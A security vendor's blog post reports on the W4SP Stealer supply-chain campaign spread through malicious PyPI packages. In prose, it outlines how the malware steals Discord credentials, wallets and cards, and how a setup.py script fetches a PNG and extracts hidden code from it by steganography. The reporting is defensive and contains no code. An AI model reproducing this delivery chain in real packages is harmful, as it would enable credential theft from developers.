Check the status of CVEs. Learn More.
Keeping your systems up 100% of the time requires live patching. Our solutions will align strongly with your risk, compliance, and operational uptime requirements.
TuxCare is trusted by the most innovative companies across the globe.
Learn about TuxCare's modern approach to reducing cybersecurity risk with Blogs, White Papers, and more.
Continually increasing Cybersecurity, stability, and availability of Linux servers and open source software since 2009.
TuxCare provides live security patching for numerous industries. Learn how TuxCare is minimizing risk for companies around the world.
2x a month. No spam.
November 29, 2022 - TuxCare expert team
Security researchers from Checkmarx have uncovered an ongoing supply chain attack that involves spreading the malware identified as W4SP Stealer.
W4SP Stealer is a discord malware that grabs all the Discord accounts, passwords, crypto wallets, credit cards and other data on a victim’s PC and then sends them back to the attacker.
W4SP Stealer is currently sold for $20 and interested buyers can pay with crypto or gift cards. The maker of WASP claims it is entirely undetectable and is “protected by some awesome obfuscation.”
The attackers leverage malicious Python packages to distribute the malware. Checkmarx claimed hundreds of users are already victims of the malware. Checkmarx’s report therefore buttress findings from Phylum and Check Point which saw them flag 30 different modules published on the Python Package Index (PyPI). These modules were specifically designed to propagate malicious code under the guise of benign-looking packages.
According to researchers at Checkmarx, the threat actor behind the attacks is “WASP.” The attacker use polymorphic malware, reboot persistent and stenography to hide code inside packages, building a fake GitHub reputation in the process.
Polymorphic code uses a polymorphic engine to mutate while keeping the original algorithm intact. This means that the code changes itself every time it runs although the function of the code remains the same. The technique is used by computer viruses, shellcodes and computer worms to hide their presence.
After installing the malicious package, the setup.py script is executed, and additional Python packages are installed. The setup.pyscript downloads a .PNG image and saves it in the operating system’s temp directory. The setup.py script then uses the “Isb.reveal” function located in the malicious “judyb” package to extract a hidden code from the image downloaded.
The sources for this piece include an article in TheHackerNews.
Learn About Live Patching with TuxCare
According to CyberArk researchers, GPT-based models like ChatGPT can be...
Malicious hackers have started exploiting a critical vulnerability CVE-2022-44877 in...
Deep Instinct researchers reported that RATs like StrRAT and Ratty...
According to CircleCI’s CTO, Rob Zuber, CircleCI is working with...
A remote attacker could exploit multiple vulnerabilities in four Cisco...
In a notable IcedID malware attack, the assailant impacted the...
Tech Support
Documentation
Login
Contact Us